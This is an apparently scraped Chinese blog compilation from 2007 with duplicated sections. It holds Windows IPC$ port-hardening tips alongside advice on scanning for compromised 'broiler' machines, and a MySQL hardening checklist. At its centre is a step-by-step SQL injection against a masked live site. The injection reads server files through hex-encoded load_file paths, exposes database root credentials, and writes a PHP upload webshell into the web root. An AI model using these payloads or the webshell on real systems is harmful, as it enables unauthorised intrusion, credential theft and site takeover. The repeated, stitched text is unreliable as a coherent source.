如果禁止所以人連接你的 135 137 139 445 端口后,如果你是在一個(gè)局域網(wǎng)里,那共享功能也無效了!可以設(shè)置防火墻允許局域網(wǎng)用戶通過,就可以解決共享問題!
如果你是一臺(tái)機(jī)上網(wǎng)的,根本不用共享的功能,你可以關(guān)掉如下服務(wù):
Computer Browser
Server
Workstation
這樣,IPC就不建立了,IPC入侵就不能成功,但防火墻還是要開,因?yàn)橛行┕ぞ哌€是可以通過
135端口的WMI服務(wù),進(jìn)行入侵!
啊D工具掃描,使用注意!
-------------------------------------------------------------------------------------------------------
當(dāng)你使用啊D工具包進(jìn)行掃描時(shí),你也不想成為肉雞,請(qǐng)把你的帳號(hào)密碼不要設(shè)置為空,
并帳號(hào)的密碼不能太過簡單,并使用防火墻禁止 135,139,445端口!
UDP的137 端口必須開放,如果不開發(fā),掃不到肉雞!
也請(qǐng)把下面的服務(wù)開啟!
Computer Browser
Server
Workstation
如上設(shè)置,你可以掃到別人,別人掃描不到你!這樣就可以進(jìn)行漏洞檢測了!
怎樣防范
--------------------------------------------------------------------
請(qǐng)把你系統(tǒng)帳號(hào)設(shè)置為非空的密碼,而密碼不能太簡單!這樣,別人就掃描不出你的密碼!當(dāng)然要你記得住,如果自己都記不住那就。。。。
請(qǐng)加一個(gè)防火墻,把IPC相關(guān)的端口禁止外網(wǎng)訪問!
端口如下:
要禁止TCP的端口,135,139,445
要禁止UDP的端口 137 (這是讀取你機(jī)子名字的端口,MAC掃描就是掃描這個(gè)端口的)
這樣,別人利用IPC$(也就是常說的肉雞掃描)就掃不到你機(jī)子了!
如果禁止所以人連接你的 135 137 139 445 端口后,如果你是在一個(gè)局域網(wǎng)里,那共享功能也無效了!可以設(shè)置防火墻允許局域網(wǎng)用戶通過,就可以解決共享問題!
如果你是一臺(tái)機(jī)上網(wǎng)的,根本不用共享的功能,你可以關(guān)掉如下服務(wù):
Computer Browser
Server
Workstation
這樣,IPC就不建立了,IPC入侵就不能成功,但防火墻還是要開,因?yàn)橛行┕ぞ哌€是可以通過
135端口的WMI服務(wù),進(jìn)行入侵!
啊D工具掃描,使用注意!
-------------------------------------------------------------------------------------------------------
當(dāng)你使用啊D工具包進(jìn)行掃描時(shí),你也不想成為肉雞,請(qǐng)把你的帳號(hào)密碼不要設(shè)置為空,
并帳號(hào)的密碼不能太過簡單,并使用防火墻禁止 135,139,445端口!
UDP的137 端口必須開放,如果不開發(fā),掃不到肉雞!
也請(qǐng)把下面的服務(wù)開啟!
Computer Browser
Server
Workstation
如上設(shè)置,你可以掃到別人,別人掃描不到你!這樣就可以進(jìn)行漏洞檢測了!
記一次安全檢測的全部過程
[ 2007-03-25 03:57:56 | 作者: sun ]
copy from 至尊寶's Blog
>>>>>>記一次安全檢測<<<<<<
測試站點(diǎn)如下
http://www.******.com
找個(gè)踩點(diǎn)
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830
提交一個(gè) '
返回結(jié)果
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154
路徑出來了,繼續(xù)安檢.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #
返回錯(cuò)誤,不是字符型.
注明:%23是#
提交 and 1=1 返回正常
提交 and 1=2 返回不正常
接下來就是 union 語句
and 1=1 union select 1 返回不正常
and 1=1 union select 1,2 返回不正常
and 1=1 union select 1,2,3 返回不正常
and 1=1 union select 1,2,3,4 返回不正常
and 1=1 union select 1,2,3,4,5 返回不正常
and 1=1 union select 1,2,3,4,5,6 返回不正常
and 1=1 union select 1,2,3,4,5,6,7 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常
猜到 14 就正常了 繼續(xù)下一步.
一般這樣的站點(diǎn)基本上后臺(tái)是不可能那么容易讓我們找到的..
還是先看看有沒有再說吧..
猜猜常用的路徑.
login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php
等等.有耐心的可以慢慢去猜.就算猜到了也沒什么用.
我們還是用比較直接的方法吧.直接用 load_file 讀取文件內(nèi)容
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 變成 and 1=2
返回結(jié)果如下:
2
就在2的位置暴了我們需要的文件內(nèi)容.
我們就從 /var/www/html/zhaobiao/zhaobiao_hy_show.php
直接用 load_file('/var/www/html/zhaobiao/zhaobiao_hy_show.php')
前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 轉(zhuǎn)換成 16 進(jìn)制
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14
返回結(jié)果
0 or $regdate>mysql_result($query,0,'yxdate')){?>
",mysql_result($query,0,'sm'));?>
不要管這些,直接查看源文件找到了一個(gè) inc.php 的文件 然后配合前面的路徑
/var/www/html/inc.php
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14
暴一下 返回看不到內(nèi)容 直接查看源文件
<?
$myconn=mysql_connect('localhost','root','www.******.comy0p5h1i0');
mysql_select_db('mlk');
?>
Mysql 直接暴出來了..
下一步就是登陸 Mysql 然后插入自己準(zhǔn)備好的小馬..
use mlk;
create table mmxy (cmd TEXT);
insert into mmxy values('<?php');
insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');
insert into mmxy values('echo $msg;');
insert into mmxy values('?>');
insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');
insert into mmxy values('<input NAME="MyFile" TYPE="file">');
insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');
select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';
>>>>>>記一次安全檢測<<<<<<
測試站點(diǎn)如下
http://www.******.com
找個(gè)踩點(diǎn)
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830
提交一個(gè) '
返回結(jié)果
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140
Warning: mysql_result(): supplied argument is not a valid MySQL result resource in
/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154
路徑出來了,繼續(xù)安檢.
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #
返回錯(cuò)誤,不是字符型.
注明:%23是#
提交 and 1=1 返回正常
提交 and 1=2 返回不正常
接下來就是 union 語句
and 1=1 union select 1 返回不正常
and 1=1 union select 1,2 返回不正常
and 1=1 union select 1,2,3 返回不正常
and 1=1 union select 1,2,3,4 返回不正常
and 1=1 union select 1,2,3,4,5 返回不正常
and 1=1 union select 1,2,3,4,5,6 返回不正常
and 1=1 union select 1,2,3,4,5,6,7 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常
and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常
猜到 14 就正常了 繼續(xù)下一步.
一般這樣的站點(diǎn)基本上后臺(tái)是不可能那么容易讓我們找到的..
還是先看看有沒有再說吧..
猜猜常用的路徑.
login.php
admin.php
admin_login.php
admin_index.php
admin/login.php
admin/admin.php
admin/admin_login.php
admin/admin_index.php
manage/index.php
manage/login.php
manage/admin_login.php
manage/admin_index.php
等等.有耐心的可以慢慢去猜.就算猜到了也沒什么用.
我們還是用比較直接的方法吧.直接用 load_file 讀取文件內(nèi)容
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 變成 and 1=2
返回結(jié)果如下:
2
就在2的位置暴了我們需要的文件內(nèi)容.
我們就從 /var/www/html/zhaobiao/zhaobiao_hy_show.php
直接用 load_file('/var/www/html/zhaobiao/zhaobiao_hy_show.php')
前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 轉(zhuǎn)換成 16 進(jìn)制
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14
返回結(jié)果
0 or $regdate>mysql_result($query,0,'yxdate')){?>
",mysql_result($query,0,'sm'));?>
不要管這些,直接查看源文件找到了一個(gè) inc.php 的文件 然后配合前面的路徑
/var/www/html/inc.php
http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file
(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14
暴一下 返回看不到內(nèi)容 直接查看源文件
<?
$myconn=mysql_connect('localhost','root','www.******.comy0p5h1i0');
mysql_select_db('mlk');
?>
Mysql 直接暴出來了..
下一步就是登陸 Mysql 然后插入自己準(zhǔn)備好的小馬..
use mlk;
create table mmxy (cmd TEXT);
insert into mmxy values('<?php');
insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');
insert into mmxy values('echo $msg;');
insert into mmxy values('?>');
insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');
insert into mmxy values('<input NAME="MyFile" TYPE="file">');
insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');
select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';
數(shù)據(jù)安全之MySQL安全的二十三條軍規(guī)
[ 2007-03-25 03:57:41 | 作者: sun ]
使用MySQL,安全問題不能不注意。以下是MySQL提示的23個(gè)注意事項(xiàng):
1.如果客戶端和服務(wù)器端的連接需要跨越并通過不可信任的網(wǎng)絡(luò),那么就需要使用SSH隧道來加密該連接的通信。
2.用set password語句來修改用戶的密碼,三個(gè)步驟,先“mysql -u root”登陸數(shù)據(jù)庫系統(tǒng),然后“mysql> update mysql.user set password=password('newpwd')”,最后執(zhí)行“flush privileges”就可以了。
3.需要提防的攻擊有,防偷聽、篡改、回放、拒絕服務(wù)等,不涉及可用性和容錯(cuò)方面。對(duì)所有的連接、查詢、其他操作使用基于ACL即訪問控制列表的安全措施來完成。也有一些對(duì)SSL連接的支持。
4.除了root用戶外的其他任何用戶不允許訪問mysql主數(shù)據(jù)庫中的user表;
加密后存放在user表中的加密后的用戶密碼一旦泄露,其他人可以隨意用該用戶名/密碼相應(yīng)的數(shù)據(jù)庫;
5.用grant和revoke語句來進(jìn)行用戶訪問控制的工作;
6.不使用明文密碼,而是使用md5()和sha1()等單向的哈系函數(shù)來設(shè)置密碼;
7.不選用字典中的字來做密碼;
8.采用防火墻來去掉50%的外部危險(xiǎn),讓數(shù)據(jù)庫系統(tǒng)躲在防火墻后面工作,或放置在DMZ區(qū)域中;
9.從因特網(wǎng)上用nmap來掃描3306端口,也可用telnet server_host 3306的方法測試,不能允許從非信任網(wǎng)絡(luò)中訪問數(shù)據(jù)庫服務(wù)器的3306號(hào)TCP端口,因此需要在防火墻或路由器上做設(shè)定;
10.為了防止被惡意傳入非法參數(shù),例如where ID=234,別人卻輸入where ID=234 or 1=1導(dǎo)致全部顯示,所以在web的表單中使用''或""來用字符串,在動(dòng)態(tài)URL中加入%22代表雙引號(hào)、%23代表井號(hào)、%27代表單引號(hào);傳遞未檢查過的值給mysql數(shù)據(jù)庫是非常危險(xiǎn)的;
11.在傳遞數(shù)據(jù)給mysql時(shí)檢查一下大小;
12.應(yīng)用程序需要連接到數(shù)據(jù)庫應(yīng)該使用一般的用戶帳號(hào),只開放少數(shù)必要的權(quán)限給該用戶;
13.在各編程接口(C C++ PHP Perl Java JDBC等)中使用特定‘逃脫字符’函數(shù);
在因特網(wǎng)上使用mysql數(shù)據(jù)庫時(shí)一定少用傳輸明文的數(shù)據(jù),而用SSL和SSH的加密方式數(shù)據(jù)來傳輸;
14.學(xué)會(huì)使用tcpdump和strings工具來查看傳輸數(shù)據(jù)的安全性,例如tcpdump -l -i eth0 -w -src or dst port 3306 | strings。以普通用戶來啟動(dòng)mysql數(shù)據(jù)庫服務(wù);
15.不使用到表的聯(lián)結(jié)符號(hào),選用的參數(shù) --skip-symbolic-links;
16.確信在mysql目錄中只有啟動(dòng)數(shù)據(jù)庫服務(wù)的用戶才可以對(duì)文件有讀和寫的權(quán)限;
17.不許將process或super權(quán)限付給非管理用戶,該mysqladmin processlist可以列舉出當(dāng)前執(zhí)行的查詢文本;super權(quán)限可用于切斷客戶端連接、改變服務(wù)器運(yùn)行參數(shù)狀態(tài)、控制拷貝復(fù)制數(shù)據(jù)庫的服務(wù)器;
18.file權(quán)限不付給管理員以外的用戶,防止出現(xiàn)load data '/etc/passwd'到表中再用select 顯示出來的問題;
19.如果不相信DNS服務(wù)公司的服務(wù),可以在主機(jī)名稱允許表中只設(shè)置IP數(shù)字地址;
20.使用max_user_connections變量來使mysqld服務(wù)進(jìn)程,對(duì)一個(gè)指定帳戶限定連接數(shù);
21.grant語句也支持資源控制選項(xiàng);
22.啟動(dòng)mysqld服務(wù)進(jìn)程的安全選項(xiàng)開關(guān),--local-infile=0或1 若是0則客戶端程序就無法使用local load data了,賦權(quán)的一個(gè)例子grant insert(user) on mysql.user to 'user_name'@'host_name';若使用--skip-grant-tables系統(tǒng)將對(duì)任何用戶的訪問不做任何訪問控制,但可以用mysqladmin flush-privileges或mysqladmin reload來開啟訪問控制;默認(rèn)情況是show databases語句對(duì)所有用戶開放,可以用--skip-show-databases來關(guān)閉掉。
23.碰到Error 1045(28000) Access Denied for user 'root'@'localhost' (Using password:NO)錯(cuò)誤時(shí),你需要重新設(shè)置密碼,具體方法是:先用--skip-grant-tables參數(shù)啟動(dòng)mysqld,然后執(zhí)行mysql -u root mysql,mysql>update user set password=password('newpassword') where user='root';mysql>Flush privileges;,最后重新啟動(dòng)mysql就可以了。
